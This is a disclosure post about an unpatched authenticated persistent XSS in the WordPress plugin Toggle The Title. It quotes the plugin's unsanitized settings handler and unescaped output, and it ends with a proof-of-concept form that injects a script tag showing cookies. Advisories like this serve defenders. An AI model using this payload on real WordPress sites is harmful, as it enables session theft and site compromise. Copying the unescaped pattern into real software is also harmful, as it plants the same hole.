As part of making sure our customers are getting the best information on vulnerabilities in WordPress plugins they may be using we monitor for hackers probing for usage of plugins on our website and then try to figure out what the hackers might be looking to exploit. Today we have had what look to be hackers probing for usage of five plugins. Two of those have recently had vulnerabilities disclosed that involve persistent cross-site scripting (XSS). The other three do not appear to have had vulnerabilities recently disclosed, but have persistent XSS vulnerabilities as well. One of those plugins is Toggle The Title, which has 10,000+ installs according to wordpress.org and was last updated five years ago. In looking over the plugin we found that it contains an authenticated persistent cross-site scripting (XSS) vulnerability, which could possibly be what hackers would be interested in it.

The plugin resister the function TitleToggler_update_wp_options() to be accessible to anyone logged in to WordPress:

43

add_action('wp_ajax_update_title_options','TitleToggler_update_wp_options'); //save the checked statuos (autosave)

That function will update the plugin’s settings without sanitizing or validating the values:

158
159
160
161

function TitleToggler_update_wp_options() {
	TitleToggler_set_headers();
	update_option('TitleToggler_autoSave', $_POST[isAutoSaveValveChecked]);
	update_option('TitleToggler_disableAllPages', $_POST[isDisableAllPagesValveChecked]);

Those relate to settings that are checkboxes, so validating would be a good approach. There also should be a capabilities check and protection against cross-site request forgery (CSRF) before allowing the settings to be changed.

Those values are then output by without being escaped by the function title_TitleToggler_inner_custom_box() when accessing the plugin’s admin page:

133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150

function title_TitleToggler_inner_custom_box() {
	$output = '	
	<div class="hook_toggle_btn">
		<label>
			<br>
			<input id="hook_toggle_btn_title_autosave" type="checkbox" name="hook_toggle_btn_title_autosave" value="1" '.get_option('TitleToggler_autoSave').'/>'.__('Autosave on change title status?', 'title_toogler').'
		</label>
 
		<label>
			<br>
			<input id="hook_toggle_btn_title_disableAllPages" type="checkbox" name="hook_toggle_btn_title_disableAllPages" value="1" '.get_option('TitleToggler_disableAllPages').'/>'.__('Disable all pages Titles?', 'title_toogler').'
		</label>
 
			<br><br><input type="submit" id="toggle_title_submit" class="button-primary" value="Save Changes" />
	<div>';
 
	return $output;
}

Combined that is an authenticated persistent cross-site scripting (XSS) vulnerability.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof concept will cause any available cookies to be shown in an alert box on the page /wp-admin/options-general.php?page=TitleToggle, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=update_title_options" method="POST">
<input type="hidden" name="isAutoSaveValveChecked" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="isDisableAllPagesValveChecked" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Concerned About The Security of the Plugins You Use?